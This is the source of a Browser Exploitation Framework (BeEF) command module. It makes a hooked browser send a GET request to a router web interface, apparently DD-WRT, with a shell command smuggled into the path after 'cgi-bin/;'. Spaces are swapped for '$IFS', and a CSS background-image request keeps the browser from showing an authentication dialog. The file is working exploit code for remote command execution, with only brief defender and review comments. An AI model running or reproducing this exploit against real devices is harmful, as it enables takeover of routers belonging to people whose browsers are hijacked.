//
// Copyright (c) 2006-2015 Wade Alcorn - wade@bindshell.net
// Browser Exploitation Framework (BeEF) - http://beefproject.com
// See the file 'doc/COPYING' for copying permission
//
/**
 * BeEF command-module body (ERB template): makes the hooked browser issue a
 * single GET request to <host>/cgi-bin/;<cmd>, then reports that the attempt
 * was made.
 *
 * The request is triggered through a CSS background-image URL on a temporary
 * <div>, so this script never reads the response. The value sent back to BeEF
 * is the fixed string 'result=exploit attempted'; it is not a confirmation
 * that anything ran on the target.
 *
 * Defender notes: on the target's web interface this shows up as a GET whose
 * path begins with "/cgi-bin/;" and may contain the literal token "$IFS",
 * issued by a LAN browser on behalf of another page. A management interface
 * that is patched or not reachable from user browsers does not act on it.
 */
beef.execute(function() {
  // Filled in server-side by ERB before the script reaches the browser.
  // NOTE(review): both values land inside single-quoted JS literals with no
  // escaping visible in this template; confirm escaping happens upstream.
  var target = '<%= @host %>';
  var command = '<%= @cmd %>';
  var cgiPrefix = 'cgi-bin/;';

  // Make sure the base URL ends with exactly the separator the path expects.
  if (target.charAt(target.length - 1) !== '/') {
    target += '/';
  }

  // Whitespace runs become the literal text "$IFS" so the command has no raw
  // whitespace in the URL. The guard only looks for a space character, so a
  // command containing tabs but no space is left unchanged.
  if (command.indexOf(' ') !== -1) {
    command = command.replace(/\s+/g, '$IFS');
  }

  var requestUrl = target + cgiPrefix + command;

  // Prevent auth dialog by generating the request via a CSS URL instead of an invisible iframe.
  // The variable name suggests the intended target is a DD-WRT web interface;
  // nothing else in this file states the target.
  var ddwrt_div_<%= @command_id %> = document.createElement('div');
  ddwrt_div_<%= @command_id %>.setAttribute(
    'style',
    'background-image: url("' + requestUrl + '")'
  );
  document.body.appendChild(ddwrt_div_<%= @command_id %>);

  // Reported immediately after the element is attached, without waiting for
  // (or being able to observe) the outcome of the request.
  beef.net.send('<%= @command_url %>', <%= @command_id %>, 'result=exploit attempted');

  // Remove the temporary element from the page after 15 seconds.
  setTimeout(function() {
    document.body.removeChild(ddwrt_div_<%= @command_id %>);
  }, 15000);
});